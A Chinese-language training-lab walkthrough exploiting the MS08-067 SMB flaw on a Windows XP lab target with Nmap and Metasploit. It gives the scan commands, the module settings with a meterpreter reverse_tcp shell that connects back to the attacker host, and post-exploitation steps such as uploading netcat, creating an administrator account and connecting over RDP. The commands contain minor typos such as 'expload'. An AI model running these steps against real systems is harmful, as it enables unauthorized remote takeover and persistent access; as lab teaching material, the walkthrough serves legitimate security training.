漏洞环境:i春秋漏洞实验室
实验环境
操作机 :Kali 2017
操作机IP:172.16.11.2
目标机:Windows XP S2 中文版
目标机IP:172.16.12.2
实验目的
认知Windows远程溢出漏洞的危害
知悉MS08-067漏洞的发现和验证过程
学习Metasploit工具的使用
实验工具
Nmap:端口扫描探测工具,用于探测端口开放情况,本次使用其端口扫描和漏洞扫描功能
mestasploit:开源的渗透测试框架软件、综合型漏洞利用工具,本次实验使用其漏洞利用模块、meterpreter组件
漏洞原理简述
MS08-067 漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。
NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。
实验步骤
第1步 漏洞探测
打开Kali终端,使用Nmap对目标机开放端口进行扫描
使用这条命令来扫主机开放的端口:nmap -sV -Pn 172.16.12.2
可以看见目标机开放了135``139``445``3389端口,且目标机系统为Windows_XP。一想到XP或者2003系统的445端口开放,我们就能想到轰动一时的ms08-067。
我们使用nmap的漏洞扫描脚本查看漏洞是否可用
nmap -sV -Pn -p 445 --script smb-vuln-ms08-067.nse 172.16.12.2
出现这种情况,说明此漏洞可利用
ps:nmap漏扫脚本目录:/usr/share/nmap/script/ 可自行查看其它脚本
第2步 漏洞利用
终端内输入msfconsole打开 metasploite 命令行客户端,使用search命令查找ms08-067的漏洞利用模块
search ms08-067
使用use命令选择我们要使用的利用模块
在运行该模块之前,一般需要设置相关选项,我们使用show options查看配置信息
设置需要攻击的目标主机ip
set RHOST 172.16.12.2
之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shell的payload
反弹一个shell
set payload windows/meterpreter/reverse_tcp
当然载荷也需要进行配置,所以我们选择渗透所用的载荷后,同样使用show options查看配置信息
可以看见我们只设置了目标主机的ip,没有设置本机的ip,所以此刻需要设置一下
set LHOST 172.16.11.2
MS08-067 针对不同的系统可以选择不同的target,使用命令show targets可以看见支持的系统
设置编号为10的操作系统这是我们现在需要攻击的目标主机系统
set target 10
设置成功后,输入命令:expload 攻击
如果出现了meterpreter说明成功返回一个shell,获取到了一个session
第3步:Meterpreter常用命令
sysinfo 使用sysinfo命令可以查看目标系统的基本信息
route 命令用于显示目标主机的路由信息,通常用来探测目标机的网络情况,有助于网络拓扑的构建
upload / download Meterpreter的upload和download命令可以上传文件到目标机器上,或下载文件至本地 (图中1.txt为自己新建的文件,内容任意)
思考:利用上传我们可以干啥?比如上传netcat.exe文件
shell shell 命令用于获取一个可以交互的shell,方便执行系统命令
查看系统信息,创建账户,还可以打开服务
可以看见目标主机有开启3389端口,我们可以利用创建超级管理员,来远程登陆到目标主机
使用rdesktop来远程连接目标主机(kali默认安装)
连接成功
实验结果分析与总结
通过本次实验,我们学习了从发现漏洞、到验证漏洞、再到利用漏洞这一整个过程,并初步学习了Metasploit这一工具的使用。后续我们会进一步探索其他漏洞,结合实例去学习MSF后渗透模块的知识
